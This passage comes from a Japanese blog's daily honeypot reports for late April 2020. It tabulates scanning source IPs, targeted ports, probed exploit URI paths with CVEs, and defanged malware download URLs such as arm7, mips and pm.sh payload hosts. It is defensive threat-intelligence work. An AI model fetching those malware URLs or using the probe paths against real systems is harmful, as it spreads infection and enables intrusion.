3391 12 件
3396 11 件
3399 11 件
3395 10 件
3398 10 件
3388 10 件
3392 9 件
3397 9 件
3394 8 件
33389 8 件
33890 8 件
3387 7 件
3381 7 件
3380 7 件
3386 6 件
3384 6 件
23389 6 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 8197 件 Link
185[.]202[.]2[.]77 France 3536 件 Link
185[.]158[.]113[.]43 Russia 1967 件 Link
185[.]202[.]2[.]120 France 895 件 Link
185[.]202[.]1[.]10 France 847 件 Link
52[.]170[.]209[.]74 United States 482 件 Link
45[.]141[.]84[.]21 Russia 445 件 Link
92[.]63[.]194[.]15 Russia 329 件 Link
195[.]54[.]167[.]225 Russia 215 件 Link
185[.]202[.]1[.]85 France 100 件 Link
95[.]47[.]248[.]84 Ukraine 79 件 Link
185[.]153[.]199[.]12 Russia 73 件 Link
185[.]153[.]196[.]99 Russia 70 件 Link
185[.]153[.]199[.]81 Russia 69 件 Link
92[.]63[.]194[.]21 Russia 69 件 Link
185[.]153[.]196[.]239 Russia 66 件 Link
185[.]153[.]199[.]87 Russia 62 件 Link
92[.]63[.]194[.]241 Russia 59 件 Link
79[.]124[.]62[.]38 Bulgaria 52 件 Link
185[.]202[.]1[.]28 France 38 件 Link

Port 1433

IP Country Count AbuseIPDB
95[.]0[.]153[.]133 Turkey 102 件 Link
112[.]140[.]186[.]234 Singapore 102 件 Link
83[.]142[.]167[.]139 Russia 102 件 Link
124[.]47[.]2[.]194 China 102 件 Link
200[.]71[.]190[.]205 Venezuela 102 件 Link
175[.]188[.]188[.]205 China 102 件 Link
61[.]141[.]236[.]46 China 102 件 Link
203[.]251[.]73[.]253 South Korea 102 件 Link
121[.]22[.]19[.]213 China 101 件 Link
210[.]77[.]90[.]42 China 95 件 Link
122[.]226[.]73[.]86 China 92 件 Link
61[.]166[.]196[.]102 China 80 件 Link
222[.]179[.]220[.]252 China 76 件 Link
221[.]114[.]210[.]132 Japan 71 件 Link
58[.]220[.]248[.]188 China 52 件 Link
177[.]91[.]103[.]133 Brazil 43 件 Link
1[.]235[.]102[.]226 South Korea 16 件 Link
27[.]71[.]81[.]82 Vietnam 11 件 Link
125[.]65[.]79[.]95 China 9 件 Link
123[.]65[.]245[.]30 China 2 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/30)

フランスから大量のRDPの不正アクセスを狙ったと思われる通信を検知していました。

Port(TOP20)

  1. Honeytrap
Port Service Count
22 The Secure Shell (SSH) Protocol 2687 件
445 Microsoft-DS 1558 件
1433 Microsoft-SQL-Server 1499 件
3389 MS WBT Server 662 件
502 Modbus Application Protocol 252 件
515 spooler 94 件
28017 Unknown 80 件
9600 MICROMUSE-NCPW 70 件
81 Unknown 67 件
8081 Sun Proxy Admin Service 59 件
8080 HTTP Alternate (see port 80) 56 件
84 Common Trace Facility 52 件
5000 Unknown 48 件
5432 PostgreSQL Database 42 件
2323 3d-nfsd 41 件
5008 Synapsis EDGE 39 件
5357 Web Services for Devices 39 件
139 NETBIOS Session Service 37 件
119 Network News Transfer Protocol 29 件
465 URL Rendezvous Directory for SSMMessage Submission over TLS protocol 26 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 10562 件 Link
185[.]158[.]113[.]43 Russia 2048 件 Link
205[.]247[.]24[.]10 United States 1782 件 Link
185[.]202[.]2[.]120 France 994 件 Link
198[.]245[.]50[.]167 Canada 938 件 Link
218[.]92[.]0[.]208 China 911 Link
185[.]202[.]1[.]10 France 898 件 Link
49[.]88[.]112[.]72 China 519 件 Link
185[.]202[.]1[.]85 France 503 件 Link
52[.]170[.]209[.]74 United States 480 件 Link
89[.]248[.]167[.]131 Netherlands 257 件 Link
195[.]54[.]167[.]225 Russia 230 件 Link
198[.]108[.]67[.]48 United States 109 件 Link
186[.]119[.]119[.]233 Colombia 103 件 Link
171[.]109[.]118[.]40 China 102 件 Link
198[.]255[.]110[.]219 United States 102 件 Link
124[.]160[.]119[.]86 China 102 件 Link
124[.]158[.]12[.]167 Vietnam 102 件 Link
61[.]187[.]189[.]30 China 102 件 Link
181[.]50[.]99[.]8 Colombia 102 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
77[.]247[.]108[.]119 Estonia 7 件 Link
5[.]101[.]0[.]209 Russia 7 件 Link
144[.]91[.]101[.]44 Germany 6 件 Link
178[.]124[.]194[.]162 Belarus 1 件 Link
185[.]173[.]60[.]7 Lebanon 1 件 Link
78[.]31[.]227[.]184 Republic of Lithuania 1 件 Link
162[.]243[.]136[.]15 United States 1 件 Link
172[.]105[.]89[.]161 Germany 1 件 Link
186[.]101[.]123[.]194 Ecuador 1 件 Link
134[.]169[.]109[.]83 Germany 1 件 Link
200[.]46[.]45[.]114 Panama 1 件 Link
62[.]173[.]152[.]144 Russia 1 件 Link
46[.]98[.]130[.]177 Ukraine 1 件 Link
176[.]121[.]190[.]144 Russia 1 件 Link
218[.]7[.]19[.]244 China 1 件 Link
117[.]239[.]149[.]94 India 1 件 Link
193[.]118[.]53[.]194 Germany 1 件 Link
192[.]241[.]202[.]244 United States 1 件 Link
200[.]93[.]10[.]247 Venezuela 1 件 Link
89[.]40[.]73[.]119 Romania 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
77[.]247[.]108[.]119 Estonia 7 件 Link
5[.]101[.]0[.]209 Russia 7 件 Link
144[.]91[.]101[.]44 Germany 6 件 Link
178[.]124[.]194[.]162 Belarus 1 件 Link
185[.]173[.]60[.]7 Lebanon 1 件 Link
78[.]31[.]227[.]184 Republic of Lithuania 1 件 Link
162[.]243[.]136[.]15 United States 1 件 Link
172[.]105[.]89[.]161 Germany 1 件 Link
186[.]101[.]123[.]194 Ecuador 1 件 Link
134[.]169[.]109[.]83 Germany 1 件 Link
200[.]46[.]45[.]114 Panama 1 件 Link
62[.]173[.]152[.]144 Russia 1 件 Link
46[.]98[.]130[.]177 Ukraine 1 件 Link
176[.]121[.]190[.]144 Russia 1 件 Link
218[.]7[.]19[.]244 China 1 件 Link
117[.]239[.]149[.]94 India 1 件 Link
193[.]118[.]53[.]194 Germany 1 件 Link
192[.]241[.]202[.]244 United States 1 件 Link
200[.]93[.]10[.]247 Venezuela 1 件 Link
89[.]40[.]73[.]119 Romania 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/metrics - - -
/search - - -
/v2/_catalog Docker - -

02 WOWHoneypot

URI Path Target CVE Memo
/0bef Unknown - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/web_shell_cmd[.]gch ZTE F460/F660 CVE-2014-2321 -
/iLPX Unknown - -
/x Unknown - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 24844 件
/ - - 485 件
login[.]cgi D-Link Router - 36 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 23 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 14 件
/nice - - 12 件
sip:nm Session Initiation Protocol - 11 件
/robots[.]txt robots.txt - 9 件
/cgi-bin/luci CGI - 8 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 8 件
/remote/login VPN Login - 8 件
/index[.]asp index - 8 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 8 件
[.][.]/[.][.]/proc/ proc directory - 8 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 8 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 7 件
/home[.]asp ASP file - 6 件
/login[.]cgi D-Link Router - 6 件
/vpn/index[.]html - - 6 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/version - - 5 件
/cgi CGI - 3 件
/_ping Unknown - 3 件
/jmx JMX - 3 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 2 件
/jars Unknown - 2 件
/v1[.]16/version - - 2 件
/api api - 2 件
/server-info Apache - 2 件
RTSP://160[.]16[.]145[.]183:8554/ Real Time Streaming Protocol - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 1 件
/info - - 1 件
/metrics New - 1 件
/solr/admin/info/system Apache Solr - 1 件
/v2/stats/self ETCD API - 1 件
/search New - 1 件
/v2/_catalog New - 1 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 1 件
/versions - - 1 件
/ipp CUPS CVE-2015-1158 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 1 件
SERVER - - 1 件
/v1[.]40/containers/json Docker Engine API - 1 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
rtsp://160[.]16[.]145[.]183:10554/ Real Time Streaming Protocol - 1 件
/_search Elasticsearch - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 25 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 4 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/muieblackcat Muieblackcat(scan tool) - 1 件
//phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
//phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
//pma/scripts/setup[.]php phpMyAdmin - 1 件
//myadmin/scripts/setup[.]php Administrator - 1 件
//MyAdmin/scripts/setup[.]php Administrator - 1 件
/0bef New - 1 件
/manager/html Apache Tomcat Manager - 1 件
/portal/redlion Unknown - 1 件
/phpmyadmin phpMyAdmin - 1 件
/solr/admin/info/system Apache Solr - 1 件
/index[.]php - - 1 件
/api/jsonws/invoke api - 1 件
/ReportServer SQL Server Reporting Services CVE-2020-0618 1 件
hxxp://www[.]proxylists[.]net/proxyjudge
[.]php
 Unauthorized relay - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 12 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/web_shell_cmd[.]gch New - 3 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/cgi-bin/luci CGI - 2 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 2 件
/remote/login VPN Login - 2 件
/index[.]asp index - 2 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 2 件
/iLPX New - 1 件
/x New - 1 件
/home[.]asp ASP file - 1 件
/login[.]cgi D-Link Router - 1 件
/vpn/index[.]html - - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件

Malware

  1. Honeytrap
Malware Localport RemoteIP URI Path Count
hxxp://178[.]33[.]64[.]107/arm7 8089 96[.]65[.]72[.]247 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 113[.]214[.]30[.]171 No uri path 1 件
hxxp://176[.]123[.]3[.]96/arm7 8089 69[.]41[.]128[.]33 /cgi 1 件
hxxp://192[.]3[.]45[.]185/arm7 8089 93[.]46[.]112[.]134 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 125[.]46[.]11[.]67 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 125[.]46[.]11[.]67 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 125[.]46[.]11[.]67 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 125[.]46[.]11[.]67 No uri path 1 件
hxxp://178[.]33[.]64[.]107/arm7 9673 156[.]110[.]25[.]26 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://147[.]75[.]67[.]253/bins/mpsl 8080 121[.]174[.]147[.]44 /tmUnblock[.]cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 112[.]90[.]197[.]66 No uri path 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 52[.]170[.]209[.]74 United States 480 件 Link
3389 95[.]47[.]248[.]84 Ukraine 79 件 Link
3389 212[.]92[.]123[.]35 Netherlands 28 件 Link
3389 222[.]174[.]105[.]82 China 6 件 Link
3391 212[.]92[.]123[.]15 Netherlands 4 件 Link
14711 185[.]202[.]2[.]120 France 4 件 Link
56910 185[.]153[.]199[.]45 Russia 4 件 Link
40310 185[.]153[.]199[.]45 Russia 4 件 Link
44710 185[.]153[.]199[.]45 Russia 4 件 Link
5210 185[.]153[.]199[.]45 Russia 4 件 Link
30610 185[.]153[.]199[.]45 Russia 4 件 Link
3389 104[.]206[.]128[.]10 United States 3 件 Link
33951 185[.]202[.]2[.]120 France 3 件 Link
53086 185[.]202[.]2[.]120 France 3 件 Link
54519 185[.]202[.]2[.]120 France 3 件 Link
3389 104[.]206[.]128[.]38 United States 3 件 Link
61744 185[.]202[.]2[.]120 France 3 件 Link
53363 185[.]202[.]2[.]120 France 3 件 Link
12698 185[.]202[.]2[.]120 France 3 件 Link
3389 104[.]206[.]128[.]50 United States 3 件 Link

Port

Port Count
3389 650 件
3390 12 件
3391 11 件
3392 10 件
3388 7 件
33389 6 件
23389 6 件
23704 5 件
17637 5 件
17584 5 件
19709 5 件
33891 5 件
18509 5 件
5000 5 件
18677 5 件
19749 5 件
24640 5 件
19996 5 件
19384 5 件
18582 5 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 10562 件 Link
185[.]158[.]113[.]43 Russia 2048 件 Link
185[.]202[.]2[.]120 France 994 件 Link
185[.]202[.]1[.]10 France 898 件 Link
185[.]202[.]1[.]85 France 503 件 Link
52[.]170[.]209[.]74 United States 480 件 Link
195[.]54[.]167[.]225 Russia 230 件 Link
185[.]209[.]0[.]59 Latvia 91 件 Link
95[.]47[.]248[.]84 Ukraine 79 件 Link
212[.]92[.]123[.]35 Netherlands 28 件 Link
185[.]202[.]2[.]149 France 26 件 Link
141[.]98[.]81[.]79 Panama 22 件 Link
185[.]153[.]199[.]45 Russia 20 件 Link
92[.]63[.]194[.]21 Russia 19 件 Link
92[.]63[.]194[.]241 Russia 15 件 Link
185[.]153[.]199[.]12 Russia 14 件 Link
185[.]153[.]199[.]81 Russia 13 件 Link
185[.]153[.]196[.]239 Russia 11 件 Link
185[.]153[.]199[.]87 Russia 11 件 Link
185[.]202[.]2[.]132 France 8 件 Link

Port 1433

IP Country Count AbuseIPDB
171[.]109[.]118[.]40 China 102 件 Link
198[.]255[.]110[.]219 United States 102 件 Link
124[.]160[.]119[.]86 China 102 件 Link
124[.]158[.]12[.]167 Vietnam 102 件 Link
61[.]187[.]189[.]30 China 102 件 Link
181[.]50[.]99[.]8 Colombia 102 件 Link
186[.]119[.]119[.]233 Colombia 102 件 Link
222[.]73[.]136[.]163 China 100 件 Link
220[.]248[.]36[.]53 China 93 件 Link
221[.]131[.]189[.]41 China 91 件 Link
222[.]184[.]35[.]136 China 87 件 Link
113[.]105[.]151[.]99 China 73 件 Link
103[.]239[.]165[.]45 Indonesia 70 件 Link
45[.]167[.]76[.]7 Brazil 64 件 Link
60[.]255[.]187[.]232 China 54 件 Link
45[.]185[.]208[.]208 Brazil 37 件 Link
203[.]7[.]167[.]25 Hong Kong 30 件 Link
66[.]220[.]12[.]92 United States 16 件 Link
202[.]100[.]211[.]228 China 4 件 Link
115[.]23[.]172[.]118 South Korea 3 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/29)

今までと比較して、Port1433宛の通信がかなり減りました。。。何があったのだろうか。。。。

Port(TOP20)

  1. Honeytrap
Port Service Count
22 The Secure Shell (SSH) Protocol 2797 件
445 Microsoft-DS 1776 件
1433 Microsoft-SQL-Server 791 件
3389 MS WBT Server 272 件
37777 Unknown 149 件
81 Unknown 116 件
5901 Unknown 83 件
1167 Cisco IP SLAs Control Protocol 78 件
6379 An advanced key-value cache and store 62 件
6666 Unknown 54 件
79 Finger 52 件
8080 HTTP Alternate (see port 80) 51 件
8081 Sun Proxy Admin Service 47 件
5672 AMQP 46 件
9092 Xml-Ipc Server Reg 45 件
139 NETBIOS Session Service 45 件
1200 SCOL 43 件
8088 Radan HTTP 42 件
5984 CouchDB 40 件
465 URL Rendezvous Directory for SSMMessage Submission over TLS protocol 32 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11558 件 Link
198[.]108[.]67[.]48 United States 5676 件 Link
185[.]158[.]113[.]43 Russia 2172 件 Link
205[.]247[.]24[.]10 United States 1858 件 Link
198[.]245[.]50[.]167 Canada 1271 件 Link
185[.]202[.]2[.]120 France 996 件 Link
218[.]92[.]0[.]208 China 885 件 Link
185[.]202[.]1[.]10 France 818 件 Link
49[.]88[.]112[.]70 China 379 件 Link
194[.]61[.]24[.]119 Netherlands 343 件 Link
185[.]202[.]1[.]85 France 223 件 Link
35[.]204[.]156[.]167 Unknown 131 件 Link
80[.]82[.]65[.]74 Netherlands 118 件 Link
58[.]39[.]107[.]88 China 102 件 Link
14[.]152[.]80[.]11 China 102 件 Link
157[.]56[.]8[.]39 United States 102 件 Link
59[.]120[.]12[.]57 Taiwan 101 件 Link
221[.]210[.]52[.]145 China 98 件 Link
95[.]47[.]248[.]84 Ukraine 79 件 Link
112[.]95[.]173[.]173 China 78 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
62[.]33[.]140[.]2 Russia 9 件 Link
120[.]79[.]222[.]186 China 9 件 Link
81[.]200[.]9[.]16 Russia 9 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
5[.]101[.]0[.]209 Russia 7 件 Link
84[.]52[.]97[.]249 Russia 6 件 Link
35[.]226[.]79[.]112 United States 4 件 Link
180[.]241[.]246[.]23 Indonesia 1 件 Link
34[.]221[.]208[.]148 United States 1 件 Link
190[.]93[.]138[.]68 Colombia 1 件 Link
91[.]232[.]217[.]160 Russia 1 件 Link
145[.]255[.]1[.]16 Russia 1 件 Link
108[.]24[.]172[.]118 United States 1 件 Link
45[.]13[.]93[.]82 Germany 1 件 Link
78[.]165[.]110[.]34 Turkey 1 件 Link
217[.]247[.]112[.]55 Germany 1 件 Link
45[.]175[.]181[.]2 Brazil 1 件 Link
190[.]128[.]154[.]222 Paraguay 1 件 Link
74[.]105[.]241[.]2 United States 1 件 Link
170[.]244[.]201[.]248 Brazil 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
62[.]33[.]140[.]2 Russia 9 件 Link
120[.]79[.]222[.]186 China 9 件 Link
81[.]200[.]9[.]16 Russia 9 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
5[.]101[.]0[.]209 Russia 7 件 Link
84[.]52[.]97[.]249 Russia 6 件 Link
35[.]226[.]79[.]112 United States 4 件 Link
180[.]241[.]246[.]23 Indonesia 1 件 Link
34[.]221[.]208[.]148 United States 1 件 Link
190[.]93[.]138[.]68 Colombia 1 件 Link
91[.]232[.]217[.]160 Russia 1 件 Link
145[.]255[.]1[.]16 Russia 1 件 Link
108[.]24[.]172[.]118 United States 1 件 Link
45[.]13[.]93[.]82 Germany 1 件 Link
78[.]165[.]110[.]34 Turkey 1 件 Link
217[.]247[.]112[.]55 Germany 1 件 Link
45[.]175[.]181[.]2 Brazil 1 件 Link
190[.]128[.]154[.]222 Paraguay 1 件 Link
74[.]105[.]241[.]2 United States 1 件 Link
170[.]244[.]201[.]248 Brazil 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/invoker/EJBInvokerServlet omcat/JBoss CVE-2013-4810 -
/dfshealth[.]htmlHadoop - - -

02 WOWHoneypot

URI Path Target CVE Memo
- - - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/axis2/services/Cat/exec Apache Axis2 - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 28640 件
/ - - 2317 件
login[.]cgi D-Link Router - 38 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 31 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p
hp
 - - 16 件
/nice - - 15 件
sip:nm Session Initiation Protocol - 13 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p
hp
 - - 12 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 11 件
/robots[.]txt robots.txt - 10 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph
p
 - - 8 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 7 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/home[.]asp ASP file - 5 件
/login[.]cgi D-Link Router - 5 件
/vpn/index[.]html - - 5 件
/cgi-bin/luci CGI - 5 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 5 件
/remote/login VPN Login - 5 件
/index[.]asp index - 5 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 5 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p
hp
 - - 5 件
/manager/html Apache Tomcat Manager - 5 件
/jmx JMX - 4 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 4 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 4 件
/version - - 4 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 4 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 2 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 2 件
/jars Unknown - 2 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 2 件
/cgi CGI - 2 件
/cgi-bin/nobody/ CGI - 1 件
/solr/admin/info/system Apache Solr - 1 件
/cgi-bin/authLogin[.]cgi CGI - 1 件
/master-status Unknown - 1 件
/invoker/EJBInvokerServlet New - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/v1[.]16/version - - 1 件
/shell MVPower DVR - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 1 件
[.][.]/[.][.]/proc/ proc directory - 1 件
/_search Elasticsearch - 1 件
/dfshealth[.]html New - 1 件
/sitemap[.]xml XML sitemap - 1 件
/hudson Unknown - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 35 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 7 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 4 件
/home[.]asp ASP file - 3 件
/login[.]cgi D-Link Router - 3 件
/vpn/index[.]html - - 3 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 3 件
/remote/login VPN Login - 3 件
/index[.]asp index - 3 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 3 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/boaform/admin/formPing Administrator - 2 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 1 件
/phpmyadmin/ phpMyAdmin - 1 件
/solr/admin/info/system Apache Solr - 1 件
/index[.]php - - 1 件
/api/jsonws/invoke api - 1 件
/portal/redlion Unknown - 1 件
/adv,/cgi-bin/weblogin[.]cgi Zyxel NAS CVE-2020-9054 1 件
/cdn-cgi/trace Cloudflare - 1 件
/hudson Unknown - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 13 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/home[.]asp ASP file - 3 件
/login[.]cgi D-Link Router - 3 件
/vpn/index[.]html - - 3 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 3 件
/remote/login VPN Login - 3 件
/index[.]asp index - 3 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 3 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 2 件
/axis2/services/Cat/exec New - 1 件
/login Login Page - 1 件
/version - - 1 件
/index[.]php - - 1 件
/api/jsonws/invoke api - 1 件

Malware

  1. Honeytrap
Malware Localport RemoteIP URI Path Count
hxxp://2[.]56[.]240[.]32/bins/Hilix[.]mips 52869 45[.]148[.]10[.]50 /picsdesc[.]xml 2 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 125[.]46[.]11[.]67 No uri path 1 件
hxxp://5[.]206[.]227[.]18/curl 5555 68[.]183[.]87[.]54 No uri path 1 件
hxxp://178[.]33[.]64[.]107/arm7 9673 45[.]65[.]222[.]136 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件
hxxp://192[.]192[.]78[.]216:9090/gH/S0[.]php 8080 77[.]182[.]23[.]20 /cgi-bin/authLogin[.]cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 125[.]46[.]11[.]67 No uri path 1 件
hxxp://179[.]43[.]147[.]86/mips 52869 37[.]49[.]226[.]130 /picsdesc[.]xml 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 125[.]46[.]11[.]67 No uri path 1 件
hxxp://178[.]32[.]148[.]5/arm7 8089 118[.]70[.]177[.]235 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 125[.]46[.]11[.]67 No uri path 1 件
hxxp://176[.]123[.]3[.]96/arm7 8089 93[.]41[.]129[.]126 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 112[.]90[.]197[.]66 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 112[.]90[.]197[.]66 No uri path 1 件
hxxp://185[.]172[.]110[.]224/ab/arm7 60001 80[.]82[.]78[.]104 /shell 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 112[.]90[.]197[.]66 No uri path 1 件
hxxp://147[.]75[.]67[.]253/bins/mpsl 8080 218[.]148[.]229[.]143 /tmUnblock[.]cgi 1 件
hxxp://178[.]33[.]64[.]107/arm7 9673 96[.]86[.]248[.]165 /live/CPEManager/AXCampaignManager/delete_cpes_by_ids 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 95[.]47[.]248[.]84 Ukraine 79 件 Link
3389 52[.]170[.]209[.]74 United States 64 件 Link
3389 212[.]92[.]123[.]5 Netherlands 19 件 Link
3389 222[.]174[.]105[.]82 China 6 件 Link
3389 95[.]217[.]74[.]143 Germany 6 件 Link
17656 185[.]202[.]1[.]19 France 4 件 Link
22991 185[.]202[.]1[.]19 France 4 件 Link
18410 185[.]202[.]1[.]19 France 4 件 Link
18246 185[.]202[.]1[.]19 France 4 件 Link
19407 185[.]202[.]1[.]19 France 4 件 Link
19313 185[.]202[.]1[.]19 France 4 件 Link
24798 185[.]202[.]1[.]19 France 4 件 Link
23505 185[.]202[.]1[.]19 France 4 件 Link
24517 185[.]202[.]1[.]19 France 4 件 Link
19647 185[.]202[.]1[.]19 France 4 件 Link
18615 185[.]202[.]1[.]19 France 4 件 Link
23342 185[.]202[.]1[.]19 France 4 件 Link
18961 185[.]202[.]1[.]19 France 4 件 Link
17114 185[.]202[.]1[.]19 France 4 件 Link
19527 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
3389 256 件
3390 11 件
3391 10 件
3392 8 件
19180 7 件
18239 7 件
22814 7 件
24254 6 件
19733 6 件
23389 6 件
23497 6 件
33890 5 件
33892 5 件
3397 5 件
3394 5 件
23505 5 件
18615 5 件
23342 5 件
18764 5 件
3399 5 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11558 件 Link
185[.]158[.]113[.]43 Russia 2172 件 Link
185[.]202[.]2[.]120 France 996 件 Link
185[.]202[.]1[.]10 France 818 件 Link
194[.]61[.]24[.]119 Netherlands 343 件 Link
185[.]202[.]1[.]85 France 223 件 Link
95[.]47[.]248[.]84 Ukraine 79 件 Link
52[.]170[.]209[.]74 United States 64 件 Link
185[.]153[.]199[.]12 Russia 34 件 Link
185[.]202[.]0[.]27 United Kingdom 31 件 Link
195[.]54[.]160[.]99 Russia 25 件 Link
185[.]202[.]2[.]149 France 24 件 Link
195[.]54[.]167[.]225 Russia 19 件 Link
212[.]92[.]123[.]5 Netherlands 19 件 Link
185[.]176[.]222[.]39 Latvia 16 件 Link
31[.]13[.]191[.]90 Sweden 12 件 Link
185[.]202[.]1[.]36 France 11 件 Link
163[.]172[.]68[.]20 United Kingdom 8 件 Link
185[.]202[.]2[.]244 France 8 件 Link
185[.]209[.]0[.]59 Latvia 8 件 Link

Port 1433

IP Country Count AbuseIPDB
58[.]39[.]107[.]88 China 102 件 Link
14[.]152[.]80[.]11 China 102 件 Link
157[.]56[.]8[.]39 United States 102 件 Link
59[.]120[.]12[.]57 Taiwan 101 件 Link
221[.]210[.]52[.]145 China 98 件 Link
